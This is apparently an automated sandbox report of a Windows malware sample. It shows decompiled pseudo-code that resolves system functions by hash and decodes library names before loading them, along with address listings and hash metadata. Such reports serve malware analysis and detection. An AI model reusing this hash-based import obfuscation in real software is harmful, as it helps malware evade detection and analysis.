				 *0xb0d66c = E00AEC4D0(_t198, _t305, _t530, 0x87b48db6, _t527, _t530);
				_push(1);
				E00AEC4D0(_t199, _t305, _t530, 0xe78a3691, _t527, _t530);
				 *(_t539 - 0x80) =  *(_t539 - 0x80) +  *(_t539 - 0x8c);
				_push(1);
				 *0xb0d678 = E00AEC4D0( *(_t539 - 0x80) +  *(_t539 - 0x8c), _t305, _t530, 0x8a32b199, _t527, _t530);
				_push(1);
				 *0xb0d614 = E00AEC4D0(_t203, _t305, _t530, 0x5d01f6dc, _t527, _t530);
				_push(1);
				 *0xb0d67c = E00AEC4D0(_t204, _t305, _t530, 0xc4c6bcdd, _t527, _t530);
				_push(1);
				 *(_t539 - 0x9c) = ( *(_t539 - 0x80) & 0x000000ff) * ( *(_t539 - 0x8c) & 0x000000ff);
				 *0xb0d630 = E00AEC4D0( *(_t539 - 0x8c) & 0x000000ff, _t305, _t530, 0x36f6b151, _t527, _t530);
				if( *((intOrPtr*)(_t539 - 0xec)) > _t527) {
					 *((intOrPtr*)(_t539 - 0xac)) = 0;
				}
				 *0xb0d6cc = E00AEC4D0(_t208, _t305, _t530, 0x7cbc1f1f, _t527, _t530);
				 *0xb0d6e0 = E00AEC4D0(_t209, _t305, _t530, 0x9842fe37, _t527, _t530);
				 *0xb0d65c = E00AEC4D0(_t210, _t305, _t530, 0x9104807e, _t527, _t530);
				 *0xb0d5f8 = E00AEC4D0(_t211, _t305, _t530, 0xd06fb818, _t527, _t530);
				 *0xb0d600 = E00AEC4D0(_t212, _t305, _t530, 0x163e9a97, _t527, _t530);
				 *0xb0d620 = E00AEC4D0(_t213, _t305, _t530, 0x4a1e958d, _t527, _t530);
				_t215 = E00AEC4D0(_t214, _t305, _t530, 0xf4fea79f, _t527, _t530);
				 *0xb0d6b0 = E00AEC4D0(_t215, _t305, _t530, 0xb3d42f89, _t527, _t530);
				 *0xb0d6c4 = E00AEC4D0(_t216, _t305, _t530, 0x3e1b436, _t527, _t530);
				 *0xb0d638 = E00AEC4D0(_t217, _t305, _t530, 0x5a3605e4, _t527, _t530);
				 *0xb0d6fc = E00AEC4D0(_t218, _t305, _t530, 0x407917fc, _t527, _t530);
				_t220 = E00AEC4D0(_t219, _t305, _t530, 0x2a62a7c5, _t527, _t530);
				_t221 = E00AEC4D0(_t220, _t305, _t530, 0xa6c565e0, _t527, _t530);
				_t222 = E00AEC4D0(_t221, _t305, _t530, 0xbea934e, _t527, _t530);
				E00AEC4D0(_t222, _t305, _t530, 0x722407a4, _t527, _t530);
				 *((short*)(_t539 - 0x5c)) = 0;
				asm("xorps xmm0, xmm0");
				asm("movq [ebp-0x64], xmm0");
				E00AED430(_t305, 0xb0c9c4, 0xa, _t527, _t530, _t644,  *0xb0d720,  *0xb0d724, _t539 - 0x64);
				_t531 =  *((intOrPtr*)( *0xb0d6f4))(_t539 - 0x64, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1);
				 *((short*)(_t539 - 0x5c)) = 0;
				asm("xorps xmm0, xmm0");
				asm("movq [ebp-0x64], xmm0");
				 *0xb0d5f0 = E00AEC4D0(_t227, _t305, _t227, 0x444a8663, _t527, _t227);
				 *0xb0d5fc = E00AEC4D0(_t228, _t305, _t227, 0x59044a9c, _t527, _t227);
				 *0xb0d608 = E00AEC4D0(_t229, _t305, _t227, 0x2f2745ba, _t527, _t227);
				 *0xb0d63c = E00AEC4D0(_t230, _t305, _t531, 0xd9eaba24, _t527, _t531);
				 *0xb0d6b8 = E00AEC4D0(_t231, _t305, _t531, 0x754b00d9, _t527, _t531);
				 *((short*)(_t539 - 8)) = 0;
				asm("xorps xmm0, xmm0");
				 *((char*)(_t539 - 6)) = 0;
				asm("movq [ebp-0x10], xmm0");
				E00AED430(_t305, 0xb0c9d0, 0xb, _t527, _t531, _t644,  *0xb0d720,  *0xb0d724, _t539 - 0x10);
				_t236 = LoadLibraryA(_t539 - 0x10); // executed
				_t532 = _t236;
				 *((short*)(_t539 - 8)) = 0;
				asm("xorps xmm0, xmm0");
				 *((char*)(_t539 - 6)) = 0;
				asm("movq [ebp-0x10], xmm0");
				 *0xb0d674 = E00AEC4D0(_t236, _t305, _t236, 0x3728416, _t527, _t236);
				 *0xb0d6ac = E00AEC4D0(_t237, _t305, _t236, 0x655814ab, _t527, _t236);
				 *0xb0d668 = E00AEC4D0(_t238, _t305, _t236, 0xaf4ebaa3, _t527, _t236);
				 *0xb0d5ec = E00AEC4D0(_t239, _t305, _t532, 0x75242930, _t527, _t532);
				 *0xb0d624 = E00AEC4D0(_t240, _t305, _t532, 0xe99a892d, _t527, _t532);
				 *0xb0d634 = E00AEC4D0(_t241, _t305, _t532, 0x1c0520bc, _t527, _t532);
				 *0xb0d604 = E00AEC4D0(_t242, _t305, _t532, 0x13e001e1, _t527, _t532);
				 *0xb0d610 = E00AEC4D0(_t243, _t305, _t532, 0x5ed4555b, _t527, _t532);
				 *0xb0d6bc = E00AEC4D0(_t244, _t305, _t532, 0x69efe534, _t527, _t532);
				 *((intOrPtr*)(_t539 - 0x30)) = 0;
				asm("xorps xmm0, xmm0");
				 *((char*)(_t539 - 0x2c)) = 0;
				asm("movq [ebp-0x38], xmm0");
				E00AED430(_t305, 0xb0c9b4, 0xd, _t527, _t532, _t644,  *0xb0d720,  *0xb0d724, _t539 - 0x38);
				_t249 = LoadLibraryA(_t539 - 0x38); // executed
				 *((intOrPtr*)(_t539 - 0x30)) = 0;
				 *((char*)(_t539 - 0x2c)) = 0;
				asm("xorps xmm0, xmm0");
				 *((short*)(_t539 - 0x14)) = 0;
				asm("movq [ebp-0x38], xmm0");
				asm("movq [ebp-0x1c], xmm0");
				 *((char*)(_t539 - 0x12)) = 0;
				E00AED430(_t305, 0xb0c9a8, 0xb, _t527, _t249, _t644,  *0xb0d720,  *0xb0d724, _t539 - 0x1c);
				_t253 = LoadLibraryA(_t539 - 0x1c); // executed
				asm("xorps xmm0, xmm0");
				 *((short*)(_t539 - 0x14)) = 0;
				asm("movq [ebp-0x1c], xmm0");
				 *((char*)(_t539 - 0x12)) = 0;
				 *0xb0d68c = E00AEC4D0(_t253, _t305, _t253, 0x90306fbe, _t527, _t249);
				 *0xb0d670 = E00AEC4D0(_t254, _t305, _t249, 0x86c9eb3e, _t527, _t249);
				 *((intOrPtr*)(_t539 - 0x40)) = 0;
				asm("xorps xmm0, xmm0");
				 *((char*)(_t539 - 0x3c)) = 0;
				asm("movq [ebp-0x48], xmm0");
				E00AED430(_t305, 0xb0c998, 0xd, _t527, _t249, _t644,  *0xb0d720,  *0xb0d724, _t539 - 0x48);
				_t259 = LoadLibraryA(_t539 - 0x48); // executed
				_t534 = _t259;
				 *((intOrPtr*)(_t539 - 0x40)) = 0;
				asm("xorps xmm0, xmm0");
				 *((char*)(_t539 - 0x3c)) = 0;
				asm("movq [ebp-0x48], xmm0");
				 *0xb0d6d4 = E00AEC4D0(_t259, _t305, _t259, 0x62f6d148, _t527, _t259);
				 *0xb0d6f0 = E00AEC4D0(_t260, _t305, _t259, 0x5579be9b, _t527, _t259);
				 *0xb0d6d8 = E00AEC4D0(_t261, _t305, _t259, 0x8cdfdcca, _t527, _t259);
				 *0xb0d5f4 = E00AEC4D0(_t262, _t305, _t534, 0x93d7992d, _t527, _t534);
				 *((short*)(_t539 - 0x20)) = 0;
				asm("xorps xmm0, xmm0");
				 *((char*)(_t539 - 0x1e)) = 0;
				asm("movq [ebp-0x28], xmm0");
				E00AED430(_t305, 0xb0ba34, 0xb, _t527, _t534, _t644,  *0xb0d720,  *0xb0d724, _t539 - 0x28);
				_t267 = LoadLibraryA(_t539 - 0x28); // executed
				_t535 = _t267;
				asm("xorps xmm0, xmm0");
				asm("movq [ebp-0x28], xmm0");
				 *((short*)(_t539 - 0x20)) = 0;
				 *((char*)(_t539 - 0x1e)) = 0;
				 *0xb0d628 = E00AEC4D0(_t267, _t305, _t267, 0x2fed0495, _t527, _t267);
				 *0xb0d690 = E00AEC4D0(_t268, _t305, _t267, 0x804afea2, _t527, _t267);
				 *0xb0d704 = E00AEC4D0(_t269, _t305, _t267, 0x9779c961, _t527, _t267);
				 *0xb0d640 = E00AEC4D0(_t270, _t305, _t535, 0x41a8781a, _t527, _t535);
				 *0xb0d644 = E00AEC4D0(_t271, _t305, _t535, 0x291bae13, _t527, _t535);
				 *0xb0d6e4 = E00AEC4D0(_t272, _t305, _t535, 0x4a722d5e, _t527, _t535);
				 *0xb0d6a4 = E00AEC4D0(_t273, _t305, _t535, 0x7c7c9794, _t527, _t535);
				 *0xb0d6ec = E00AEC4D0(_t274, _t305, _t535, 0x593d69ce, _t527, _t535);
				 *0xb0d6f8 = E00AEC4D0(_t275, _t305, _t535, 0x13fa12a3, _t527, _t535);
				 *((intOrPtr*)(_t539 - 0x70)) = 0;
				asm("xorps xmm0, xmm0");
				asm("movq [ebp-0x78], xmm0");
				E00AED430(_t305, 0xb0c7d4, 0xc, _t527, _t535, _t644,  *0xb0d720,  *0xb0d724, _t539 - 0x78);
				_t280 = LoadLibraryA(_t539 - 0x78); // executed
				asm("xorps xmm0, xmm0");
				 *((intOrPtr*)(_t539 - 0x70)) = 0;
				asm("movq [ebp-0x78], xmm0");
				 *0xb0d64c = E00AEC4D0(_t280, _t305, _t280, 0x39c58c36, _t527, _t535);
				asm("xorps xmm0, xmm0");
				asm("movlpd [ebp-0x6c], xmm0");
				E00AED430(_t305, 0xb0c9dc, 8, _t527, _t535, _t644,  *0xb0d720,  *0xb0d724, _t539 - 0x6c);
				_t285 = LoadLibraryA(_t539 - 0x6c); // executed
				asm("xorps xmm0, xmm0");
				asm("movlpd [ebp-0x6c], xmm0");
				 *0xb0d694 = E00AEC4D0(_t285, _t305, _t285, 0xd439d6f3, _t527, _t285);
				 *0xb0d6d0 = E00AEC4D0(_t286, _t305, _t285, 0x32c0a6dc, _t527, _t285);
				 *((intOrPtr*)(_t539 - 0x50)) = 0;
				asm("xorps xmm0, xmm0");
				 *((char*)(_t539 - 0x4c)) = 0;
				asm("movq [ebp-0x58], xmm0");
				E00AED430(_t305, 0xb0c988, 0xd, _t527, _t285, _t644,  *0xb0d720,  *0xb0d724, _t539 - 0x58);
				_t291 =  *((intOrPtr*)( *0xb0d6f4))(_t539 - 0x58, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1);
				 *((intOrPtr*)(_t539 - 0x50)) = 0;
				asm("xorps xmm0, xmm0");
				 *((char*)(_t539 - 0x4c)) = 0;
				_push(1);
				asm("movq [ebp-0x58], xmm0");
				E00AEC4D0(E00AEC4D0(_t291, _t305, _t291, 0x824afb51, _t527, _t291), _t305, _t291, 0x19968912, _t527, _t291);
				return E00AF7B30( *(_t539 - 4) ^ _t539, 1);
			}





































          0x00aec7d9
          0x00aec7d9
          0x00aec7d9
          0x00aec7de
          0x00aec7e3
          0x00aec7e8
          0x00aec7f5
          0x00aec7fc
          0x00aec803
          0x00aec80a
          0x00aec80f
          0x00aec815
          0x00aec81a
          0x00aec821
          0x00aec827
          0x00aec82f
          0x00aec840
          0x00aec843
          0x00aec849
          0x00aec850
          0x00aec857
          0x00aec859
          0x00aec85f
          0x00aec862
          0x00aec869
          0x00aec86b
          0x00aec86b
          0x00aec862
          0x00aec875
          0x00aec886
          0x00aec894
          0x00aec8a1
          0x00aec8a3
          0x00aec8b8
          0x00aec8d4
          0x00aec8d6
          0x00aec8dc
          0x00aec8e9
          0x00aec8f6
          0x00aec909
          0x00aec909
          0x00aec90f
          0x00aec923
          0x00aec940
          0x00aec945
          0x00aec947
          0x00aec94f
          0x00aec95a
          0x00aec970
          0x00aec973
          0x00aec97c
          0x00aec97e
          0x00aec98c
          0x00aec998
          0x00aec99f
          0x00aec9bc
          0x00aec9be
          0x00aec9cc
          0x00aec9d8
          0x00aec9e2
          0x00aec9ee
          0x00aec9fe
          0x00aeca18
          0x00aeca5b
          0x00aeca61
          0x00aeca67
          0x00aeca74
          0x00aeca78
          0x00aeca7e
          0x00aeca1a
          0x00aeca21
          0x00aeca28
          0x00aeca32
          0x00aeca36
          0x00aeca3c
          0x00aeca3f
          0x00aeca3f
          0x00aeca84
          0x00aeca92
          0x00aeca9d
          0x00aeca9f
          0x00aecaad
          0x00aecab9
          0x00aecabb
          0x00aecac7
          0x00aecafb
          0x00aecb01
          0x00aecb07
          0x00aecac9
          0x00aecad8
          0x00aecae7
          0x00aecaea
          0x00aecaea
          0x00aecb0a
          0x00aecb1b
          0x00aecb27
          0x00aecb31
          0x00aecb3d
          0x00aecb47
          0x00aecb53
          0x00aecb5d
          0x00aecb69
          0x00aecb6b
          0x00aecb7a
          0x00aecb84
          0x00aecb90
          0x00aecb9a
          0x00aecba6
          0x00aecbb0
          0x00aecbbc
          0x00aecbca
          0x00aecbdd
          0x00aecbe2
          0x00aecbec
          0x00aecbf8
          0x00aecbfa
          0x00aecbff
          0x00aecc06
          0x00aecc1c
          0x00aecc26
          0x00aecc2a
          0x00aecc38
          0x00aecc3d
          0x00aecc46
          0x00aecc4b
          0x00aecc5a
          0x00aecc61
          0x00aecc6b
          0x00aecc77
          0x00aecc81
          0x00aecc8d
          0x00aecc97
          0x00aecca3
          0x00aecca5
          0x00aeccbd
          0x00aeccc0
          0x00aeccca
          0x00aeccd6
          0x00aecce0
          0x00aeccec
          0x00aeccf9
          0x00aecd12
          0x00aecd14
          0x00aecd24
          0x00aecd30
          0x00aecd32
          0x00aecd32
          0x00aecd4d
          0x00aecd63
          0x00aecd79
          0x00aecd8f
          0x00aecda5
          0x00aecdbb
          0x00aecdc9
          0x00aecde2
          0x00aecdf8
          0x00aece0e
          0x00aece24
          0x00aece32
          0x00aece43
          0x00aece54
          0x00aece65
          0x00aece6d
          0x00aece76
          0x00aece7e
          0x00aece95
          0x00aecea8
          0x00aeceaa
          0x00aeceb0
          0x00aecebc
          0x00aecec9
          0x00aecedf
          0x00aecef5
          0x00aecf0b
          0x00aecf21
          0x00aecf29
          0x00aecf2f
          0x00aecf32
          0x00aecf3b
          0x00aecf52
          0x00aecf63
          0x00aecf65
          0x00aecf67
          0x00aecf6d
          0x00aecf70
          0x00aecf7b
          0x00aecf8a
          0x00aecfa0
          0x00aecfb6
          0x00aecfcc
          0x00aecfe2
          0x00aecff8
          0x00aed00e
          0x00aed024
          0x00aed03a
          0x00aed042
          0x00aed049
          0x00aed04c
          0x00aed055
          0x00aed06c
          0x00aed07d
          0x00aed081
          0x00aed08b
          0x00aed096
          0x00aed099
          0x00aed0aa
          0x00aed0b4
          0x00aed0b9
          0x00aed0bd
          0x00aed0ce
          0x00aed0d0
          0x00aed0d3
          0x00aed0e0
          0x00aed0e7
          0x00aed0f3
          0x00aed109
          0x00aed111
          0x00aed118
          0x00aed11b
          0x00aed124
          0x00aed13b
          0x00aed14c
          0x00aed14e
          0x00aed150
          0x00aed157
          0x00aed15a
          0x00aed165
          0x00aed174
          0x00aed18a
          0x00aed1a0
          0x00aed1b6
          0x00aed1be
          0x00aed1c4
          0x00aed1c7
          0x00aed1d0
          0x00aed1e7
          0x00aed1f8
          0x00aed1fa
          0x00aed1fc
          0x00aed206
          0x00aed20d
          0x00aed213
          0x00aed21f
          0x00aed235
          0x00aed24b
          0x00aed261
          0x00aed277
          0x00aed28d
          0x00aed2a3
          0x00aed2b9
          0x00aed2cf
          0x00aed2d7
          0x00aed2de
          0x00aed2eb
          0x00aed2fd
          0x00aed30e
          0x00aed310
          0x00aed313
          0x00aed321
          0x00aed330
          0x00aed338
          0x00aed347
          0x00aed357
          0x00aed368
          0x00aed36c
          0x00aed376
          0x00aed385
          0x00aed39b
          0x00aed3a3
          0x00aed3aa
          0x00aed3ad
          0x00aed3b6
          0x00aed3cd
          0x00aed3de
          0x00aed3e2
          0x00aed3e9
          0x00aed3ec
          0x00aed3f0
          0x00aed3f7
          0x00aed40f
          0x00aed42e

          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.727887212.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
          • Associated: 00000000.00000002.727874344.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727915439.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727932991.0000000000B0B000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727951285.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_ae0000_PLAY.jbxd
          Similarity
          • API ID:
          • String ID: $gU~$0)$u$4i$Cicw48T$G3cVs$^-rJ$~jMZ
          • API String ID: 0-2410478402
          • Opcode ID: 49fd55fa750fba50d3b1075af11412b2151e49c19937d36f6021582966f54653
          • Instruction ID: 6582b5a36e98bf944897bcc41bda80385f41a3c798cd377b9a96be695c8c6a84
          • Opcode Fuzzy Hash: 49fd55fa750fba50d3b1075af11412b2151e49c19937d36f6021582966f54653
          • Instruction Fuzzy Hash: A4620DF0F402944FEB11EBA5AC267BE3EA1AB64314F104169E40D9B3D2FF725945CB92
          Uniqueness

          Uniqueness Score: -1.00%

          Function 00AEC7B0 Relevance: 23.6, APIs: 7, Strings: 6, Instructions: 811libraryCOMMONCrypto
          Download Yara Rule

          Control-flow Graph

          C-Code - Quality: 64%
          			E00AEC7B0(void* __ebx, signed int __edi, void* __esi, void* __fp0) {
				char _t124;
				intOrPtr _t125;
				signed short _t149;
				signed short _t163;
				signed short _t166;
				void* _t179;
				intOrPtr _t186;
				intOrPtr _t190;
				void* _t209;
				void* _t214;
				void* _t215;
				void* _t216;
				struct HINSTANCE__* _t230;
				struct HINSTANCE__* _t243;
				struct HINSTANCE__* _t247;
				struct HINSTANCE__* _t253;
				struct HINSTANCE__* _t261;
				struct HINSTANCE__* _t274;
				struct HINSTANCE__* _t279;
				void* _t285;
				signed short _t297;
				void* _t299;
				void* _t301;
				signed short _t323;
				signed char _t423;
				signed int _t426;
				signed short _t436;
				void* _t518;
				signed int _t519;
				signed short _t521;
				void* _t523;
				signed int _t533;
				void* _t638;

				_t638 = __fp0;
				_t523 = __esi;
				_t519 = __edi;
				_t299 = __ebx;
				_t124 = "Cicw48T"; // 0x77636943
				 *((intOrPtr*)(_t533 - 0xb0)) = _t124;
				_t125 =  *0xb091a8; // 0x543834
				asm("movups [ebp-0x110], xmm0");
				 *((intOrPtr*)(_t533 - 0xac)) = _t125;
				asm("movq xmm0, [0xb09190]");
				asm("movq [ebp-0xbc], xmm0");
				_t426 =  *(_t533 - 0xbc) >> 0x00000008 & 0x000000ff;
				 *(_t533 - 0x8c) = __edi;
				 *(_t533 - 0x8e) = 0xd9;
				 *(_t533 - 0x79) = 0xd8;
				if(_t426 > 0x56) {
					_t423 =  *((intOrPtr*)(_t533 - 0xa1));
					_t518 = _t426 + 0xffffffaa;
					do {
						_t423 = (_t423 << 3) - _t423 + (_t423 << 3) - _t423;
						_t518 = _t518 - 1;
					} while (_t518 != 0);
				}
				_t524 = E00AEBE80(_t299, _t301, _t519, _t523, _t638);
				 *(_t533 - 0x8d) =  *((intOrPtr*)(_t533 - 0xb7)) + 1;
				 *(_t533 - 0x7b) =  *((intOrPtr*)(_t533 - 0xac)) + 1;
				_push(0);
				 *(_t533 - 0x84) =  *((intOrPtr*)(_t533 - 0xee)) + 0x00000001 & 0x0000ffff;
				 *0xb0d6f4 = E00AEC4D0( *((intOrPtr*)(_t533 - 0xee)) + 0x00000001 & 0x0000ffff, _t299, _t128, 0xbe8203b4, _t519, _t128);
				_push(1);
				 *(_t533 - 0x88) = 0x2051;
				 *(_t533 - 0x80) = ( *(_t533 - 0xa0) & 0x000000ff) * ( *(_t533 - 0x84) & 0x0000ffff);
				 *0xb0d6a8 = E00AEC4D0(0x2052, _t299, _t128, 0x2307b1a7, _t519, _t128);
				if( *(_t533 - 0x84) != 0 &&  *((char*)(_t533 - 0xba)) != 0) {
					 *(_t533 - 0x8c) = _t519;
				}
				_push(1);
				 *0xb0d6a0 = E00AEC4D0(0xffff, _t299, _t524, 0x19a330f3, _t519, _t524);
				_t520 =  *(_t533 - 0x88) & 0x0000ffff;
				_push(1);
				 *(_t533 - 0xc4) = ( *(_t533 - 0x80) & 0x000000ff) * ( *(_t533 - 0xa2) & 0x000000ff);
				 *(_t533 - 0x9c) =  *(_t533 - 0x88) & 0x0000ffff;
				 *0xb0d698 = E00AEC4D0( *(_t533 - 0x88) & 0x0000ffff, _t299, _t524, 0x2c75f7f6,  *(_t533 - 0x88) & 0x0000ffff, _t524);
				_t149 =  *(_t533 - 0x84) - 0x00000001 & 0x0000ffff;
				 *(_t533 - 0x84) = _t149;
				_push(1);
				 *(_t533 - 0x94) = _t149 & 0x0000ffff;
				 *0xb0d654 = E00AEC4D0(_t149 & 0x0000ffff, _t299, _t524, 0xc54f85bd,  *(_t533 - 0x88) & 0x0000ffff, _t524);
				_push(1);
				 *0xb0d69c = E00AEC4D0(_t151, _t299, _t524, 0x9748dd14,  *(_t533 - 0x88) & 0x0000ffff, _t524);
				_push(1);
				 *(_t533 - 0x8f) =  *((intOrPtr*)(_t533 - 0xee)) -  *((intOrPtr*)(_t533 - 0xbb)) + 0x35;
				 *0xb0d6dc = E00AEC4D0( *((intOrPtr*)(_t533 - 0xee)) -  *((intOrPtr*)(_t533 - 0xbb)) + 0x35, _t299, _t524, 0x80cd7e0c,  *(_t533 - 0x88) & 0x0000ffff, _t524);
				_push(1);
				 *0xb0d618 = E00AEC4D0(_t156, _t299, _t524, 0xc60149b9,  *(_t533 - 0x88) & 0x0000ffff, _t524);
				_push(1);
				 *0xb0d6e8 = E00AEC4D0(_t157, _t299, _t524, 0x7e556724,  *(_t533 - 0x88) & 0x0000ffff, _t524);
				if(( *(_t533 - 0x8e) & 0x000000ff) - ( *(_t533 - 0x8d) & 0x000000ff) - 1 != 1) {
					_t163 =  *(_t533 - 0x84);
					_t436 = _t163 & 0x0000ffff;
					 *(_t533 - 0x94) = _t163 & 0x0000ffff;
					 *((short*)(_t533 - 0x7c)) =  *((intOrPtr*)(_t533 - 0x10a));
					_t166 =  *(_t533 - 0x94);
					_t323 = ( *(_t533 - 0x8f) & 0x000000ff) -  *(_t533 - 0x94) + ( *(_t533 - 0x7b) & 0x000000ff) & 0x0000ffff;
				} else {
					_t323 = 1;
					 *(_t533 - 0x88) = 1;
					 *((short*)(_t533 - 0x7c)) =  *((intOrPtr*)(_t533 - 0x10a)) + 1;
					_t297 =  *(_t533 - 0x84);
					_t436 = _t297 & 0x0000ffff;
					_t166 = _t297 & 0x0000ffff;
				}
				 *(_t533 - 0x98) = _t166 & 0x0000ffff;
				 *(_t533 - 0x94) = _t436 & 0x0000ffff;
				_push(1);
				 *(_t533 - 0x84) = _t323 & 0x0000ffff;
				 *0xb0d650 = E00AEC4D0(_t323 & 0x0000ffff, _t299, _t524, 0x783255a6, _t520, _t524);
				_push(1);
				E00AEC4D0(_t170, _t299, _t524, 0x30d336e1, _t520, _t524);
				if( *(_t533 - 0x80) == 0) {
					 *(_t533 - 0x8c) =  *(_t533 - 0x84) & 0x0000ffff;
					_t174 =  *((intOrPtr*)(_t533 - 0xae));
					 *(_t533 - 0x79) =  *((intOrPtr*)(_t533 - 0xae));
				} else {
					 *(_t533 - 0x79) =  *((intOrPtr*)(_t533 - 0xae)) + 1;
					_t174 = ( *(_t533 - 0xc4) & 0x000000ff) * ( *(_t533 - 0xea) & 0x0000ffff) & 0x0000ffff;
					 *(_t533 - 0x8c) = ( *(_t533 - 0xc4) & 0x000000ff) * ( *(_t533 - 0xea) & 0x0000ffff) & 0x0000ffff;
				}
				_push(1);
				 *0xb0d61c = E00AEC4D0(_t174, _t299, _t524, 0xa14beb5d, _t520, _t524);
				_push(1);
				 *0xb0d660 = E00AEC4D0(_t175, _t299, _t524, 0x87992849, _t520, _t524);
				_push(1);
				 *0xb0d6b4 = E00AEC4D0(_t176, _t299, _t524, 0xef00a85f, _t520, _t524);
				_push(1);
				 *0xb0d664 = E00AEC4D0(_t177, _t299, _t524, 0x8ad1d5c3, _t520, _t524);
				_push(1);
				_t179 = E00AEC4D0(_t178, _t299, _t524, 0x5a4d6a7e, _t520, _t524);
				_push(1);
				 *0xb0d62c = E00AEC4D0(_t179, _t299, _t524, 0xf29fc861, _t520, _t524);
				_push(1);
				 *0xb0d684 = E00AEC4D0(_t180, _t299, _t524, 0xbdcd4a4f, _t520, _t524);
				_push(1);
				 *0xb0d648 = E00AEC4D0(_t181, _t299, _t524, 0xc08880ed, _t520, _t524);
				_push(1);
				 *0xb0d6c0 = E00AEC4D0(_t182, _t299, _t524, 0x4493b7b7, _t520, _t524);
				 *(_t533 - 0x80) =  *(_t533 - 0x80) - ( *(_t533 - 0x79) & 0x000000ff) + ( *(_t533 - 0x10e) & 0x0000ffff);
				_push(1);
				 *0xb0d700 = E00AEC4D0( *(_t533 - 0x10e) & 0x0000ffff, _t299, _t524, 0x928c170d, _t520, _t524);
				_push(1);
				_t186 = E00AEC4D0(_t185, _t299, _t524, 0x4bf279e3, _t520, _t524);
				_t521 =  *((intOrPtr*)(_t533 - 0x7c));
				 *0xb0d6c8 = _t186;
				 *((intOrPtr*)(_t533 - 0xac)) = 0;
				_push(1);
				 *(_t533 - 0x8c) = ( *(_t533 - 0xa2) & 0x000000ff) + (_t521 & 0x0000ffff);
				 *0xb0d688 = E00AEC4D0(( *(_t533 - 0xa2) & 0x000000ff) + (_t521 & 0x0000ffff), _t299, _t524, 0x9b674bff, _t521, _t524);
				_push(1);
				_t190 = E00AEC4D0(_t189, _t299, _t524, 0x3bbded58, _t521, _t524);
				 *(_t533 - 0x80) =  *(_t533 - 0x80) + 0x4bf0;
				 *0xb0d60c = _t190;
				_push(1);
				 *0xb0d658 = E00AEC4D0(_t190, _t299, _t524, 0x84ea1e3b, _t521, _t524);
				_push(1);
				 *0xb0d680 = E00AEC4D0(_t191, _t299, _t524, 0xe0f6decf, _t521, _t524);
				_push(1);
				 *0xb0d66c = E00AEC4D0(_t192, _t299, _t524, 0x87b48db6, _t521, _t524);
				_push(1);
				E00AEC4D0(_t193, _t299, _t524, 0xe78a3691, _t521, _t524);
				 *(_t533 - 0x80) =  *(_t533 - 0x80) +  *(_t533 - 0x8c);
				_push(1);
				 *0xb0d678 = E00AEC4D0( *(_t533 - 0x80) +  *(_t533 - 0x8c), _t299, _t524, 0x8a32b199, _t521, _t524);
				_push(1);
				 *0xb0d614 = E00AEC4D0(_t197, _t299, _t524, 0x5d01f6dc, _t521, _t524);
				_push(1);
				 *0xb0d67c = E00AEC4D0(_t198, _t299, _t524, 0xc4c6bcdd, _t521, _t524);
				_push(1);
				 *(_t533 - 0x9c) = ( *(_t533 - 0x80) & 0x000000ff) * ( *(_t533 - 0x8c) & 0x000000ff);
				 *0xb0d630 = E00AEC4D0( *(_t533 - 0x8c) & 0x000000ff, _t299, _t524, 0x36f6b151, _t521, _t524);
				if( *((intOrPtr*)(_t533 - 0xec)) > _t521) {
					 *((intOrPtr*)(_t533 - 0xac)) = 0;
				}
				 *0xb0d6cc = E00AEC4D0(_t202, _t299, _t524, 0x7cbc1f1f, _t521, _t524);
				 *0xb0d6e0 = E00AEC4D0(_t203, _t299, _t524, 0x9842fe37, _t521, _t524);
				 *0xb0d65c = E00AEC4D0(_t204, _t299, _t524, 0x9104807e, _t521, _t524);
				 *0xb0d5f8 = E00AEC4D0(_t205, _t299, _t524, 0xd06fb818, _t521, _t524);
				 *0xb0d600 = E00AEC4D0(_t206, _t299, _t524, 0x163e9a97, _t521, _t524);
				 *0xb0d620 = E00AEC4D0(_t207, _t299, _t524, 0x4a1e958d, _t521, _t524);
				_t209 = E00AEC4D0(_t208, _t299, _t524, 0xf4fea79f, _t521, _t524);
				 *0xb0d6b0 = E00AEC4D0(_t209, _t299, _t524, 0xb3d42f89, _t521, _t524);
				 *0xb0d6c4 = E00AEC4D0(_t210, _t299, _t524, 0x3e1b436, _t521, _t524);
				 *0xb0d638 = E00AEC4D0(_t211, _t299, _t524, 0x5a3605e4, _t521, _t524);
				 *0xb0d6fc = E00AEC4D0(_t212, _t299, _t524, 0x407917fc, _t521, _t524);
				_t214 = E00AEC4D0(_t213, _t299, _t524, 0x2a62a7c5, _t521, _t524);
				_t215 = E00AEC4D0(_t214, _t299, _t524, 0xa6c565e0, _t521, _t524);
				_t216 = E00AEC4D0(_t215, _t299, _t524, 0xbea934e, _t521, _t524);
				E00AEC4D0(_t216, _t299, _t524, 0x722407a4, _t521, _t524);
				 *((short*)(_t533 - 0x5c)) = 0;
				asm("xorps xmm0, xmm0");
				asm("movq [ebp-0x64], xmm0");
				E00AED430(_t299, 0xb0c9c4, 0xa, _t521, _t524, _t638,  *0xb0d720,  *0xb0d724, _t533 - 0x64);
				_t525 =  *((intOrPtr*)( *0xb0d6f4))(_t533 - 0x64, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1);
				 *((short*)(_t533 - 0x5c)) = 0;
				asm("xorps xmm0, xmm0");
				asm("movq [ebp-0x64], xmm0");
				 *0xb0d5f0 = E00AEC4D0(_t221, _t299, _t221, 0x444a8663, _t521, _t221);
				 *0xb0d5fc = E00AEC4D0(_t222, _t299, _t221, 0x59044a9c, _t521, _t221);
				 *0xb0d608 = E00AEC4D0(_t223, _t299, _t221, 0x2f2745ba, _t521, _t221);
				 *0xb0d63c = E00AEC4D0(_t224, _t299, _t525, 0xd9eaba24, _t521, _t525);
				 *0xb0d6b8 = E00AEC4D0(_t225, _t299, _t525, 0x754b00d9, _t521, _t525);
